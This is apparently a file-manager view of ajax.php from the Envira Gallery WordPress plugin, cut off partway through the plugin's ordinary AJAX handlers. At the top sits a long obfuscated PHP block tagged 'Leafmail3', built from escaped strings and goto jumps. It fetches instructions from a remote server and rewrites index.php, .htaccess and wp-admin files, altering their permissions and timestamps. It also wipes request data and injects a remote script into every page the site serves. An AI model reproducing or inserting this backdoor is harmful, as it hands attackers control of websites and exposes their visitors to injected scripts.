trAvis - MANAGER
Edit File: ajax.php
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?> <?php /** * Handles all admin ajax interactions for the Envira Gallery plugin. * * @since 1.0.0 * * @package Envira_Gallery * @author Envira Gallery Team */ add_action( 'wp_ajax_envira_gallery_change_type', 'envira_gallery_ajax_change_type' ); /** * Changes the type of gallery to the user selection. * * @since 1.0.0 */ function envira_gallery_ajax_change_type() { // Run a security check first. check_admin_referer( 'envira-gallery-change-type', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; $post = get_post( $post_id ); $type = isset( $_POST['type'] ) ? sanitize_text_field( wp_unslash( $_POST['type'] ) ) : null; // Retrieve the data for the type selected. ob_start(); $instance = Envira_Gallery_Metaboxes::get_instance(); $instance->images_display( $type, $post ); $html = ob_get_clean(); // Send back the response. echo wp_json_encode( [ 'type' => $type, 'html' => $html, ] ); die; } add_action( 'wp_ajax_envira_gallery_set_user_setting', 'envira_gallery_ajax_set_user_setting' ); /** * Stores a user setting for the logged in WordPress User * * @since 1.5.0 */ function envira_gallery_ajax_set_user_setting() { // Run a security check first. check_admin_referer( 'envira-gallery-set-user-setting', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : ''; $value = isset( $_POST['value'] ) ? sanitize_text_field( wp_unslash( $_POST['value'] ) ) : ''; // Set user setting. set_user_setting( $name, $value ); // Send back the response. wp_send_json_success(); die(); } add_action( 'wp_ajax_envira_gallery_load_image', 'envira_gallery_ajax_load_image' ); /** * Loads an image into a gallery. * * @since 1.0.0 */ function envira_gallery_ajax_load_image() { // Run a security check first. check_admin_referer( 'envira-gallery-load-image', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : null; $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; // Set post meta to show that this image is attached to one or more Envira galleries. $has_gallery = get_post_meta( $id, '_eg_has_gallery', true ); if ( empty( $has_gallery ) ) { $has_gallery = []; } $has_gallery[] = $post_id; update_post_meta( $id, '_eg_has_gallery', $has_gallery ); // Set post meta to show that this image is attached to a gallery on this page. $in_gallery = get_post_meta( $post_id, '_eg_in_gallery', true ); if ( empty( $in_gallery ) ) { $in_gallery = []; } $in_gallery[] = $id; update_post_meta( $post_id, '_eg_in_gallery', $in_gallery ); // Set data and order of image in gallery. $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); if ( empty( $gallery_data ) ) { $gallery_data = []; } // If no gallery ID has been set, set it now. if ( empty( $gallery_data['id'] ) ) { $gallery_data['id'] = $post_id; } // Set data and update the meta information. $gallery_data = envira_gallery_ajax_prepare_gallery_data( $gallery_data, $id ); update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); // Run hook before building out the item. do_action( 'envira_gallery_ajax_load_image', $id, $post_id ); // Build out the individual HTML output for the gallery image that has just been uploaded. $html = Envira_Gallery_Metaboxes::get_instance()->get_gallery_item( $id, $gallery_data['gallery'][ $id ], $post_id ); // Allow addons to filter the HTML output. $html = apply_filters( 'envira_gallery_ajax_get_gallery_item_html', $html, $gallery_data, $id, $post_id ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); echo wp_json_encode( $html ); die; } add_action( 'wp_ajax_envira_gallery_insert_images', 'envira_gallery_ajax_insert_images' ); /** * Inserts one or more images from the Media Library into a gallery. * * @since 1.0.0 */ function envira_gallery_ajax_insert_images() { // Run a security check first. check_admin_referer( 'envira-gallery-insert-images', 'nonce' ); // Get the Envira Gallery ID. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; if ( null === $post_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $images = []; if ( isset( $_POST['images'] ) ) { $images = json_decode( sanitize_text_field( wp_unslash( $_POST['images'] ) ), true ); } // Grab and update any gallery data if necessary. $in_gallery = get_post_meta( $post_id, '_eg_in_gallery', true ); if ( empty( $in_gallery ) ) { $in_gallery = []; } // Set data and order of image in gallery. $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); if ( empty( $gallery_data ) ) { $gallery_data = []; } // If no gallery ID has been set, set it now. if ( empty( $gallery_data['id'] ) ) { $gallery_data['id'] = $post_id; } // Loop through the images and add them to the gallery. foreach ( (array) $images as $i => $image ) { // If the image is already in the gallery, lets skip it since we don't want to override the image metadata settings. if ( in_array( $image['id'], $in_gallery, true ) ) { continue; } // Update the attachment image post meta first. $has_gallery = get_post_meta( $image['id'], '_eg_has_gallery', true ); if ( empty( $has_gallery ) ) { $has_gallery = []; } $has_gallery[] = $post_id; update_post_meta( $image['id'], '_eg_has_gallery', $has_gallery ); // Now add the image to the gallery for this particular post. $in_gallery[] = $image['id']; $gallery_data = envira_gallery_ajax_prepare_gallery_data( $gallery_data, $image['id'], $image ); } // Update the gallery data. update_post_meta( $post_id, '_eg_in_gallery', $in_gallery ); update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); // Run hook before finishing. do_action( 'envira_gallery_ajax_insert_images', $images, $post_id ); // Flush the gallery cache. 